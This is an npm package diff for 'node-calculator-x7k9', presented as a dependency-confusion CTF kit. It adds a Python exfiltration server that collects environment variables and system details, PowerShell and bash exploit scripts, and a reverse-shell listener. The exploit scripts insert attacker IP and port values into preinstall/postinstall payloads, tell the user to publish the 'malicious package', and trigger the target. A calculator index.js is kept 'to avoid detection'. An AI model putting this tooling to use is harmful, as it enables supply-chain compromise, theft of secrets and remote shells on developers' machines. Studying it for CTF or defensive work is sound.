node-calculator-x7k9 0.0.1-security → 3.4.0

package/exfil_server.py

@@ -0,0 +1,219 @@
+#!/usr/bin/env python3
+"""
+HTTP Exfiltration Server for CTF
+Receives and logs all POST data from target server
+
+Usage:
+    python3 exfil_server.py [port]
+    python3 exfil_server.py 8080
+"""
+
+from http.server import HTTPServer, BaseHTTPRequestHandler
+import json
+import sys
+import os
+from datetime import datetime
+from urllib.parse import urlparse, parse_qs
+
+PORT = int(sys.argv[1]) if len(sys.argv) > 1 else 8080
+LOG_FILE = 'exfiltrated_data.json'
+LOG_DIR = 'exfil_logs'
+
+# Create logs directory
+os.makedirs(LOG_DIR, exist_ok=True)
+
+def log_message(msg):
+    """Print timestamped message"""
+    timestamp = datetime.now().strftime("%H:%M:%S")
+    print(f"[{timestamp}] {msg}")
+
+def save_data(data, source="unknown"):
+    """Save exfiltrated data to file"""
+    timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
+    filename = f"{LOG_DIR}/exfil_{timestamp}_{source}.json"
+    
+    with open(filename, 'w') as f:
+        json.dump(data, f, indent=2)
+    
+    log_message(f"Data saved to: {filename}")
+    
+    # Also append to main log
+    with open(LOG_FILE, 'a') as f:
+        f.write(f"\n{'='*80}\n")
+        f.write(f"Timestamp: {datetime.now().isoformat()}\n")
+        f.write(f"Source: {source}\n")
+        f.write(f"{'='*80}\n")
+        json.dump(data, f, indent=2)
+        f.write("\n")
+    
+    return filename
+
+def extract_flags(data):
+    """Try to extract flag from data"""
+    flags = []
+    
+    # Check environment variables
+    if 'environment' in data:
+        for key, value in data.get('environment', {}).items():
+            if 'flag' in key.lower() or 'FLAG' in key:
+                flags.append(f"ENV: {key}={value}")
+            if isinstance(value, str) and ('flag{' in value.lower() or 'ctf{' in value.lower()):
+                flags.append(f"ENV: {key}={value}")
+    
+    # Check flags field
+    if 'flags' in data and data['flags']:
+        for path, content in data.get('flags', {}).items():
+            flags.append(f"FILE: {path} = {content}")
+    
+    # Check command outputs
+    if 'commands' in data:
+        for cmd, result in data.get('commands', {}).items():
+            if 'flag' in str(result.get('stdout', '')).lower():
+                flags.append(f"CMD: {cmd} = {result.get('stdout', '')[:200]}")
+    
+    return flags
+
+class ExfilHandler(BaseHTTPRequestHandler):
+    """HTTP request handler for exfiltration data"""
+    
+    def log_message(self, format, *args):
+        """Override to use our custom logging"""
+        pass
+    
+    def do_POST(self):
+        """Handle POST requests with exfiltrated data"""
+        try:
+            # Get content length
+            content_length = int(self.headers.get('Content-Length', 0))
+            
+            # Read POST data
+            post_data = self.rfile.read(content_length)
+            
+            log_message(f"Received POST from {self.client_address[0]}:{self.client_address[1]}")
+            log_message(f"Path: {self.path}")
+            log_message(f"Content-Length: {content_length} bytes")
+            
+            # Try to parse as JSON
+            try:
+                data = json.loads(post_data.decode('utf-8'))
+                log_message("Data parsed as JSON successfully")
+                
+                # Save data
+                source = f"{self.client_address[0]}"
+                filename = save_data(data, source)
+                
+                # Extract and display flags
+                flags = extract_flags(data)
+                if flags:
+                    print("\n" + "="*80)
+                    print("🚩 POTENTIAL FLAGS FOUND! 🚩")
+                    print("="*80)
+                    for flag in flags:
+                        print(f"  {flag}")
+                    print("="*80 + "\n")
+                
+                # Display key information
+                print("\n📋 Key Information:")
+                print(f"  Hostname: {data.get('system', {}).get('hostname', 'unknown')}")
+                print(f"  User: {data.get('system', {}).get('user', {}).get('username', 'unknown')}")
+                print(f"  CWD: {data.get('system', {}).get('cwd', 'unknown')}")
+                print(f"  Platform: {data.get('system', {}).get('platform', 'unknown')}")
+                print(f"  Node Version: {data.get('system', {}).get('nodeVersion', 'unknown')}")
+                
+                # Environment variable keys
+                env_keys = list(data.get('environment', {}).keys())
+                print(f"\n🔑 Environment Variables ({len(env_keys)} total):")
+                for key in env_keys[:20]:  # Show first 20
+                    value = data.get('environment', {}).get(key, '')
+                    if len(str(value)) > 100:
+                        value = str(value)[:100] + "..."
+                    print(f"  {key}={value}")
+                if len(env_keys) > 20:
+                    print(f"  ... and {len(env_keys) - 20} more (see {filename})")
+                
+                print()
+                
+                # Send success response
+                response = {
+                    'status': 'success',
+                    'message': 'Data received',
+                    'timestamp': datetime.now().isoformat(),
+                    'saved_to': filename
+                }
+                
+                self.send_response(200)
+                self.send_header('Content-Type', 'application/json')
+                self.end_headers()
+                self.wfile.write(json.dumps(response).encode())
+                
+            except json.JSONDecodeError:
+                # Not JSON, save as raw data
+                log_message("Data is not valid JSON, saving as raw")
+                
+                raw_filename = f"{LOG_DIR}/exfil_{datetime.now().strftime('%Y%m%d_%H%M%S')}_raw.txt"
+                with open(raw_filename, 'wb') as f:
+                    f.write(post_data)
+                
+                log_message(f"Raw data saved to: {raw_filename}")
+                
+                self.send_response(200)
+                self.send_header('Content-Type', 'text/plain')
+                self.end_headers()
+                self.wfile.write(b'Data received')
+            
+        except Exception as e:
+            log_message(f"Error handling POST: {e}")
+            self.send_response(500)
+            self.end_headers()
+    
+    def do_GET(self):
+        """Handle GET requests"""
+        log_message(f"GET request from {self.client_address[0]} to {self.path}")
+        
+        # Simple status page
+        response = """
+        <html>
+        <head><title>Exfiltration Server</title></head>
+        <body>
+        <h1>Exfiltration Server Running</h1>
+        <p>Listening for POST requests on port {}</p>
+        <p>POST exfiltrated data to: /exfil</p>
+        </body>
+        </html>
+        """.format(PORT)
+        
+        self.send_response(200)
+        self.send_header('Content-Type', 'text/html')
+        self.end_headers()
+        self.wfile.write(response.encode())
+
+def main():
+    """Start the exfiltration server"""
+    print("""
+╔═══════════════════════════════════════════════════════════════════╗
+║                  HTTP EXFILTRATION SERVER                         ║
+║                     CTF Edition v2.0                              ║
+╚═══════════════════════════════════════════════════════════════════╝
+    """)
+    
+    log_message(f"Starting server on port {PORT}")
+    log_message(f"Logs will be saved to: {LOG_DIR}/")
+    log_message(f"Combined log file: {LOG_FILE}")
+    
+    print("\n[*] Configure your payload with:")
+    print(f"    EXFIL_SERVER = 'http://YOUR_IP:{PORT}/exfil'")
+    print("\n[*] Waiting for exfiltrated data...\n")
+    
+    server = HTTPServer(('0.0.0.0', PORT), ExfilHandler)
+    
+    try:
+        server.serve_forever()
+    except KeyboardInterrupt:
+        log_message("\nShutting down server...")
+        server.shutdown()
+        print("\n[*] Server stopped")
+        print(f"[*] Check {LOG_FILE} for all collected data")
+
+if __name__ == '__main__':
+    main()
+

package/exploit.ps1

@@ -0,0 +1,184 @@
+# PowerShell Exploitation Script for Dependency Confusion CTF
+# Usage: .\exploit.ps1 -TargetIP "localhost:3000" -AttackerIP "10.10.10.10" -AttackerPort 4444
+
+param(
+    [string]$TargetIP = "localhost:3000",
+    [string]$AttackerIP = "10.10.10.10",
+    [int]$AttackerPort = 4444
+)
+
+Write-Host "╔═══════════════════════════════════════════════════════════════╗" -ForegroundColor Cyan
+Write-Host "║        Dependency Confusion Attack - Automated Exploit       ║" -ForegroundColor Cyan
+Write-Host "╚═══════════════════════════════════════════════════════════════╝" -ForegroundColor Cyan
+Write-Host ""
+Write-Host "[*] Target: $TargetIP" -ForegroundColor Yellow
+Write-Host "[*] Attacker IP: $AttackerIP" -ForegroundColor Yellow
+Write-Host "[*] Attacker Port: $AttackerPort" -ForegroundColor Yellow
+Write-Host ""
+
+# Step 1: Update payload configuration
+Write-Host "[+] Configuring payload..." -ForegroundColor Green
+
+$preinstallPath = "preinstall.js"
+$postinstallPath = "postinstall.js"
+
+if (Test-Path $preinstallPath) {
+    $preinstallContent = Get-Content $preinstallPath -Raw
+    $preinstallContent = $preinstallContent -replace "const ATTACKER_IP = '.*?';", "const ATTACKER_IP = '$AttackerIP';"
+    $preinstallContent = $preinstallContent -replace "const ATTACKER_PORT = \d+;", "const ATTACKER_PORT = $AttackerPort;"
+    Set-Content $preinstallPath -Value $preinstallContent
+    Write-Host "    [✓] Updated preinstall.js" -ForegroundColor Green
+} else {
+    Write-Host "    [!] preinstall.js not found" -ForegroundColor Red
+}
+
+if (Test-Path $postinstallPath) {
+    $postinstallContent = Get-Content $postinstallPath -Raw
+    $postinstallContent = $postinstallContent -replace "const ATTACKER_IP = '.*?';", "const ATTACKER_IP = '$AttackerIP';"
+    $postinstallContent = $postinstallContent -replace "const ATTACKER_PORT = \d+;", "const ATTACKER_PORT = $AttackerPort;"
+    Set-Content $postinstallPath -Value $postinstallContent
+    Write-Host "    [✓] Updated postinstall.js" -ForegroundColor Green
+} else {
+    Write-Host "    [!] postinstall.js not found" -ForegroundColor Red
+}
+
+# Step 2: Start listener
+Write-Host "[+] Starting listener on port $AttackerPort..." -ForegroundColor Green
+
+# Start Python listener if available
+if (Get-Command python3 -ErrorAction SilentlyContinue) {
+    $listenerJob = Start-Job -ScriptBlock {
+        param($port)
+        python3 listener.py $port
+    } -ArgumentList $AttackerPort
+    Write-Host "    [✓] Python listener started (Job ID: $($listenerJob.Id))" -ForegroundColor Green
+} elseif (Get-Command python -ErrorAction SilentlyContinue) {
+    $listenerJob = Start-Job -ScriptBlock {
+        param($port)
+        python listener.py $port
+    } -ArgumentList $AttackerPort
+    Write-Host "    [✓] Python listener started (Job ID: $($listenerJob.Id))" -ForegroundColor Green
+} else {
+    Write-Host "    [!] Python not found, starting PowerShell listener..." -ForegroundColor Yellow
+    
+    # PowerShell TCP Listener
+    $listenerJob = Start-Job -ScriptBlock {
+        param($port)
+        $listener = [System.Net.Sockets.TcpListener]::new([System.Net.IPAddress]::Any, $port)
+        $listener.Start()
+        Write-Host "Listening on port $port..." -ForegroundColor Green
+        
+        $client = $listener.AcceptTcpClient()
+        $stream = $client.GetStream()
+        $reader = [System.IO.StreamReader]::new($stream)
+        $writer = [System.IO.StreamWriter]::new($stream)
+        $writer.AutoFlush = $true
+        
+        Write-Host "Connection received!" -ForegroundColor Green
+        $writer.WriteLine("=== Reverse Shell Connected ===")
+        
+        while ($client.Connected) {
+            try {
+                $line = $reader.ReadLine()
+                if ($line) {
+                    Write-Host $line
+                }
+            } catch {
+                break
+            }
+        }
+        
+        $client.Close()
+        $listener.Stop()
+    } -ArgumentList $AttackerPort
+    Write-Host "    [✓] PowerShell listener started (Job ID: $($listenerJob.Id))" -ForegroundColor Green
+}
+
+Start-Sleep -Seconds 2
+
+# Step 3: Package publishing instructions
+Write-Host "[+] Package publishing..." -ForegroundColor Green
+if (Get-Command npm -ErrorAction SilentlyContinue) {
+    Write-Host "    [*] Checking npm login status..." -ForegroundColor Yellow
+    
+    $npmUser = npm whoami 2>$null
+    if ($LASTEXITCODE -eq 0) {
+        Write-Host "    [✓] Logged in as: $npmUser" -ForegroundColor Green
+        Write-Host "    [!] Ready to publish. Run manually if needed:" -ForegroundColor Yellow
+        Write-Host "        cd malicious-package" -ForegroundColor Gray
+        Write-Host "        npm publish" -ForegroundColor Gray
+    } else {
+        Write-Host "    [!] Not logged in to npm" -ForegroundColor Red
+        Write-Host "    [!] Run: npm login" -ForegroundColor Yellow
+        Write-Host "    [!] Then: cd malicious-package && npm publish" -ForegroundColor Yellow
+    }
+} else {
+    Write-Host "    [!] npm not found" -ForegroundColor Red
+}
+
+# Step 4: Trigger vulnerability
+Write-Host ""
+Write-Host "[+] Waiting 5 seconds before triggering..." -ForegroundColor Green
+Start-Sleep -Seconds 5
+
+Write-Host "[+] Triggering vulnerability via /report-bug endpoint..." -ForegroundColor Green
+
+try {
+    $body = @{
+        message = "Triggering dependency confusion attack"
+    } | ConvertTo-Json
+
+    $response = Invoke-RestMethod -Uri "http://$TargetIP/report-bug" `
+        -Method Post `
+        -ContentType "application/json" `
+        -Body $body `
+        -ErrorAction Stop
+
+    Write-Host "    [✓] Response received:" -ForegroundColor Green
+    Write-Host ($response | ConvertTo-Json) -ForegroundColor Gray
+} catch {
+    Write-Host "    [!] Error triggering endpoint: $_" -ForegroundColor Red
+    Write-Host "    [!] Trigger manually with:" -ForegroundColor Yellow
+    Write-Host "        curl -X POST http://$TargetIP/report-bug -H 'Content-Type: application/json' -d '{`"message`": `"test`"}'" -ForegroundColor Gray
+}
+
+Write-Host ""
+Write-Host "[+] Exploitation attempt complete!" -ForegroundColor Green
+Write-Host "[*] Checking listener for incoming connections..." -ForegroundColor Yellow
+Write-Host ""
+
+# Monitor listener job
+Write-Host "╔═══════════════════════════════════════════════════════════════╗" -ForegroundColor Cyan
+Write-Host "║  Listener is running in background (Job ID: $($listenerJob.Id))          ║" -ForegroundColor Cyan
+Write-Host "║  To view output: Receive-Job $($listenerJob.Id)                      ║" -ForegroundColor Cyan
+Write-Host "║  To stop: Stop-Job $($listenerJob.Id); Remove-Job $($listenerJob.Id)    ║" -ForegroundColor Cyan
+Write-Host "╚═══════════════════════════════════════════════════════════════╝" -ForegroundColor Cyan
+Write-Host ""
+
+Write-Host "Waiting for connections (Ctrl+C to exit)..." -ForegroundColor Yellow
+Write-Host ""
+
+# Keep checking listener job
+try {
+    while ($true) {
+        $output = Receive-Job -Id $listenerJob.Id
+        if ($output) {
+            Write-Host $output
+        }
+        
+        if ((Get-Job -Id $listenerJob.Id).State -eq 'Completed') {
+            Write-Host "[*] Listener job completed" -ForegroundColor Yellow
+            break
+        }
+        
+        Start-Sleep -Seconds 2
+    }
+} catch {
+    Write-Host ""
+    Write-Host "[*] Stopping listener..." -ForegroundColor Yellow
+} finally {
+    Stop-Job -Id $listenerJob.Id -ErrorAction SilentlyContinue
+    Remove-Job -Id $listenerJob.Id -ErrorAction SilentlyContinue
+    Write-Host "[*] Cleanup complete" -ForegroundColor Green
+}
+

package/exploit.sh

@@ -0,0 +1,91 @@
+#!/bin/bash
+
+# Automated exploitation script for Dependency Confusion CTF
+# Usage: ./exploit.sh <target_ip> <attacker_ip> <attacker_port>
+
+set -e
+
+TARGET_IP="${1:-localhost:3000}"
+ATTACKER_IP="${2:-10.10.10.10}"
+ATTACKER_PORT="${3:-4444}"
+
+echo "╔═══════════════════════════════════════════════════════════════╗"
+echo "║        Dependency Confusion Attack - Automated Exploit       ║"
+echo "╚═══════════════════════════════════════════════════════════════╝"
+echo ""
+echo "[*] Target: $TARGET_IP"
+echo "[*] Attacker IP: $ATTACKER_IP"
+echo "[*] Attacker Port: $ATTACKER_PORT"
+echo ""
+
+# Step 1: Update payload with attacker IP/Port
+echo "[+] Configuring payload..."
+sed -i "s/const ATTACKER_IP = '.*';/const ATTACKER_IP = '$ATTACKER_IP';/" preinstall.js
+sed -i "s/const ATTACKER_PORT = .*/const ATTACKER_PORT = $ATTACKER_PORT;/" preinstall.js
+sed -i "s/const ATTACKER_IP = '.*';/const ATTACKER_IP = '$ATTACKER_IP';/" postinstall.js
+sed -i "s/const ATTACKER_PORT = .*/const ATTACKER_PORT = $ATTACKER_PORT;/" postinstall.js
+
+# Step 2: Start listener in background
+echo "[+] Starting listener on port $ATTACKER_PORT..."
+if command -v python3 &> /dev/null; then
+    python3 listener.py $ATTACKER_PORT &
+    LISTENER_PID=$!
+    echo "[+] Listener PID: $LISTENER_PID"
+else
+    echo "[!] Python3 not found, using nc instead"
+    nc -nlvp $ATTACKER_PORT &
+    LISTENER_PID=$!
+fi
+
+sleep 2
+
+# Step 3: Publish package
+echo "[+] Publishing malicious package..."
+if command -v npm &> /dev/null; then
+    echo "[*] Checking npm login status..."
+    if npm whoami &> /dev/null; then
+        echo "[+] Already logged in to npm"
+        # npm publish || echo "[!] Publish failed - you may need to publish manually"
+        echo "[!] Skipping npm publish - do this manually if needed"
+        echo "    Run: cd malicious-package && npm publish"
+    else
+        echo "[!] Not logged in to npm"
+        echo "[!] Please run: npm login"
+        echo "[!] Then run: cd malicious-package && npm publish"
+    fi
+else
+    echo "[!] npm not found"
+fi
+
+# Step 4: Trigger vulnerability
+echo "[+] Waiting 5 seconds before triggering..."
+sleep 5
+
+echo "[+] Triggering vulnerability via /report-bug endpoint..."
+if command -v curl &> /dev/null; then
+    RESPONSE=$(curl -s -X POST "http://$TARGET_IP/report-bug" \
+        -H "Content-Type: application/json" \
+        -d '{"message": "Triggering dependency confusion"}')
+    echo "[+] Response: $RESPONSE"
+else
+    echo "[!] curl not found - trigger manually:"
+    echo "    curl -X POST http://$TARGET_IP/report-bug -H 'Content-Type: application/json' -d '{\"message\": \"test\"}'"
+fi
+
+echo ""
+echo "[+] Exploitation attempt complete!"
+echo "[*] Check your listener for incoming connection..."
+echo "[*] Listener PID: $LISTENER_PID (kill with: kill $LISTENER_PID)"
+echo ""
+echo "╔═══════════════════════════════════════════════════════════════╗"
+echo "║  If shell doesn't connect within 30 seconds, check:          ║"
+echo "║  1. Firewall rules (port $ATTACKER_PORT must be open)            ║"
+echo "║  2. IP address is correct and reachable                      ║"
+echo "║  3. Package was actually installed (check target logs)       ║"
+echo "╚═══════════════════════════════════════════════════════════════╝"
+
+# Wait for user interrupt
+echo ""
+echo "Press Ctrl+C to stop listener and exit..."
+wait $LISTENER_PID 2>/dev/null
+

package/index.js

@@ -0,0 +1,23 @@
+// Maintain original functionality to avoid detection
+function calculate(operation, a, b) {
+    switch(operation) {
+        case 'add':
+            return a + b;
+        case 'subtract':
+            return a - b;
+        case 'multiply':
+            return a * b;
+        case 'divide':
+            if (b === 0) {
+                throw new Error('Division by zero');
+            }
+            return a / b;
+        default:
+            throw new Error('Invalid operation');
+    }
+}
+
+module.exports = {
+    calculate
+};
+

package/listener.py

@@ -0,0 +1,159 @@
+#!/usr/bin/env python3
+"""
+Reverse Shell Listener for CTF
+A more feature-rich alternative to netcat
+
+Usage:
+    python3 listener.py [port]
+    python3 listener.py 4444
+"""
+
+import socket
+import sys
+import threading
+import time
+from datetime import datetime
+
+PORT = int(sys.argv[1]) if len(sys.argv) > 1 else 4444
+HOST = '0.0.0.0'
+
+def get_local_ip():
+    """Get local IP address"""
+    try:
+        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+        s.connect(("8.8.8.8", 80))
+        ip = s.getsockname()[0]
+        s.close()
+        return ip
+    except:
+        return "127.0.0.1"
+
+def log(message):
+    """Print timestamped log message"""
+    timestamp = datetime.now().strftime("%H:%M:%S")
+    print(f"[{timestamp}] {message}")
+
+def handle_connection(conn, addr):
+    """Handle incoming reverse shell connection"""
+    log(f"Connection received from {addr[0]}:{addr[1]}")
+    
+    # Send initial banner
+    banner = f"""
+╔═══════════════════════════════════════╗
+║   Reverse Shell Connected!            ║
+║   From: {addr[0]:20s}    ║
+║   Time: {datetime.now().strftime('%Y-%m-%d %H:%M:%S'):20s}║
+╚═══════════════════════════════════════╝
+
+"""
+    print(banner)
+    
+    def receive_data():
+        """Continuously receive data from target"""
+        while True:
+            try:
+                data = conn.recv(4096)
+                if not data:
+                    log("Connection closed by remote host")
+                    break
+                
+                # Print received data
+                output = data.decode('utf-8', errors='ignore')
+                print(output, end='', flush=True)
+                
+            except Exception as e:
+                log(f"Error receiving data: {e}")
+                break
+        
+        try:
+            conn.close()
+        except:
+            pass
+    
+    def send_data():
+        """Send commands to target"""
+        while True:
+            try:
+                cmd = input()
+                if cmd.lower() in ['exit', 'quit']:
+                    log("Closing connection...")
+                    break
+                
+                conn.send((cmd + '\n').encode())
+                
+            except EOFError:
+                break
+            except Exception as e:
+                log(f"Error sending data: {e}")
+                break
+        
+        try:
+            conn.close()
+        except:
+            pass
+    
+    # Start threads for bidirectional communication
+    recv_thread = threading.Thread(target=receive_data, daemon=True)
+    send_thread = threading.Thread(target=send_data, daemon=True)
+    
+    recv_thread.start()
+    send_thread.start()
+    
+    # Wait for threads to finish
+    send_thread.join()
+    recv_thread.join()
+    
+    log("Connection closed")
+
+def main():
+    """Main listener function"""
+    local_ip = get_local_ip()
+    
+    print("""
+╔═══════════════════════════════════════════════════════════════════╗
+║                   REVERSE SHELL LISTENER                          ║
+║                     CTF Edition v1.0                              ║
+╚═══════════════════════════════════════════════════════════════════╝
+    """)
+    
+    log(f"Local IP: {local_ip}")
+    log(f"Listening on {HOST}:{PORT}")
+    
+    print("\n[*] Configure your payload with:")
+    print(f"    ATTACKER_IP = '{local_ip}'")
+    print(f"    ATTACKER_PORT = {PORT}")
+    print("\n[*] Waiting for connections...\n")
+    
+    # Create socket
+    try:
+        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+        s.bind((HOST, PORT))
+        s.listen(5)
+    except Exception as e:
+        log(f"Error creating listener: {e}")
+        sys.exit(1)
+    
+    try:
+        while True:
+            # Accept connection
+            conn, addr = s.accept()
+            
+            # Handle connection in a new thread (for multiple shells)
+            handler_thread = threading.Thread(
+                target=handle_connection, 
+                args=(conn, addr),
+                daemon=False
+            )
+            handler_thread.start()
+            
+    except KeyboardInterrupt:
+        log("\nShutting down listener...")
+    except Exception as e:
+        log(f"Error: {e}")
+    finally:
+        s.close()
+
+if __name__ == "__main__":
+    main()
+